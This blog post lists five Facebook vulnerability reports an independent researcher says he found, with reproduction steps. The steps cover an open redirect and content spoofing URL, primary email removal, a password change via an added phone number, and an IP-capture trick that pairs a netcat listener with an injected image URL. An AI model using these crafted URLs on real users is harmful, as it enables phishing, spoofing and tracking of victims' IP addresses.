• Facebook Bugs | By Hacker Wahab


    Aslam-O-Alaikum(Hello) Guys Here I am this post Contain all the Bugs I Have Founded in Facebook.

    1.Open Redirect & Content Spoofing

    Vulnerability Type
    Open Redirector
    Vulnerability Scope
    Mobile Site or App
    Title
    Open Redirect & Content Spoofing
    Description and Impact
    Hi,

    after Getting A Lots of Low Impact i Come back with an Open Redirector issue.
    Reproduction Instructions/Proof of Concept
    In the Reporting Section of Facebook all the Sensitive options is Disclose on UrL:-
    https://mbasic.facebook.com/nfx/basic/question/?context_str=%7B%22initial_action_name%22%3A%22REPORT_CONTENT%22%2C%22breadcrumbs%22%3A%5B%22offensive%22%2C%22hatespeech%22%2C%22religious%22%5D%2C%22story_location%22%3A%22page%22%2C%22is_from_feed_tombstone%22%3Afalse%2C%22actions_taken%22%3A%22%22%2C%22is_rapid_reporting%22%3Afalse%2C%22reportable_ent_token%22%3A%222237869389770846%22%2C%22is_impostor%22%3A%22%22%7D&redirect_uri=http%3A%2F%2Fwww.hackerwahab.com%2F&prev_action_info=%7B%22action_name%22%3A%22UNSUBSCRIBE%22%2C%22completed_title%22%3A%22Posts+from+%5Cu200e%5Cu0645%5Cu0648%5Cu0644%5Cu0648%5Cu06cc+%5Cu0628%5Cu0631%5Cu0642%5Cu0639%5Cu06c1%5Cu200e+hidden%22%2C%22completed_subtitle%22%3A%22Poc+is+of+OPEN+REDIRECT+AND+CONTENT+SPOOFING.%22%7D&av=100015350014851&_rdr

    After redirect_uri= we can add vuln web like i added in above url and after Completed_Subtitle you can add Content Spoofing Text.

    As We interested in open redirect Click Done Then in Survey They Ask Community Stars Give Them Than Click Next then Click Submit a new page Open With Vulnerable URL
    Video PoC:-
    https://youtu.be/oFTKN7WWvQs
    Thanks,
    ABDULWAHAB,
    Independent Cyber Security Researcher,
    Is this bug public or known by third parties?
    No
    Can you reproduce this issue every time?
    Yes
    How did you find this bug?
    Manually / Other

    2.Delete Primary Email(Which is Unallowed by Facebook)

    Vulnerability Type
    Privacy / Authentication
    Vulnerability Scope
    Mobile Site or App
    Title
    Delete Primary Email(Which is Unallowed by Facebook)
    Description and Impact
    Hi,
    My Self Abdulwahab.

    As You Know That there is no way to delete an Primary Email But i found an indirect way to Delete an Primary Email.
    Reproduction Instructions/Proof of Concept
    As You can see on {POC 1.png} that there is no way to delete Primary.In Mobile site there is also no way
    We can use this url:-
    https://m.facebook.com/settings/email/?remove_email&email{Primary email Goes here}&refid=74

    to Remove primary Email.
    When u Open The Link Account Primary email Deleted as in (POC 2.png)
    As i cannot upload video here so i use Youtube
    Video PoC( Prv8 ):-
    https://youtu.be/BUG1PLnCJjw
    Thanks,
    ABDULWAHAB,
    Independent Cyber Security Researcher,
    Is this bug public or known by third parties?
    No
    Can you reproduce this issue every time?
    Yes
    How did you find this bug?
    Manually / Other

    3.Change Account Password Without Knowing Current Password


    Vulnerability Type
    Privacy / Authentication
    Vulnerability Scope
    Main Site (www.facebook.com)
    Title
    Change Account Password Without Knowing Current Password
    Description and Impact
    Hi,
    My name is ABDULWAHAB,I am Writing This to you because i think i can change a Fb Account password of a logged-in Account Without knowing Current Password.
    Reproduction Instructions/Proof of Concept
    1.Go to Settings
    2.On Mobile add a Mobile Number u have access ( Enter You Mobile Number)
    3.Logout
    4.Click Forget Password
    5.Enter Your Mobile Number you recently Added.
    6.U Receive Code enter it
    7.enter New Password And DONE!

    As You See in all Procedure i dont Use Current Password and Account Password Changed

    Fix Suggestion:-
    ask current Password Field in adding a New Phone number

    Thanks,
    ABDULWAHAB,
    Independent Cyber Security Researcher,
    Is this bug public or known by third parties?
    No
    Can you reproduce this issue every time?
    Yes
    How did you find this bug?

    4.Ip Steal Using Content Injection

    Manually / Other
    Vulnerability Type
    Privacy / Authentication
    Vulnerability Scope
    Mobile Site or App
    Title
    Ip Steal Using Content Injection
    Description and Impact
    Hi.

    I Founded an Content Injection issue on mobile site of Facebook.But it has Low impact so i try to increase Risk of Vulnerability so I found a Serious Problem IP STEAL.
    Reproduction Instructions/Proof of Concept
    1.Open Kali Linux terminal
    2.Command to Listen on Port
    nc -lvnp 1337 u can use any port
    3.Login in to Facebook Account
    4.Use this Port with YourIp In Such Way:-
    https://m.facebook.com/deactivate/incentives/?carrier_name=HACKED BY ABDULWAHAB&carrier_logo_src=http://192.168.1.16:1337/&free_days=25555
    5.When User Opens This Page Ip is Captured.
    Video Poc:-
    https://youtu.be/g2naYvWm4j0
    Thanks,
    ABDULWAHAB,
    Independent Cyber Security Researcher,
    Is this bug public or known by third parties?
    No
    Can you reproduce this issue every time?
    Yes
    How did you find this bug?
    Manually / Other

    5.Content Spoofing

    Vulnerability Type
    Other Vulnerability
    Vulnerability Scope
    Mobile Site or App
    Title
    Content Injection
    Reproduction Instructions/Proof of Concept
    1. goto Deactivate account
    2. Choose any Condition
    3.Click Deactivate
    4.Now You see an add
    5.Customize it by using its uRL

    Thanks,
    ABDULWAHAB,
    Independent Cyber Security Researcher,
    Is this bug public or known by third parties?
    No
    Can you reproduce this issue every time?
    Yes
    How did you find this bug?
    Manually / Other

    Video PoC(ALL BUGS):-


  • 0 comments:

    Post a Comment

    Powered by Blogger.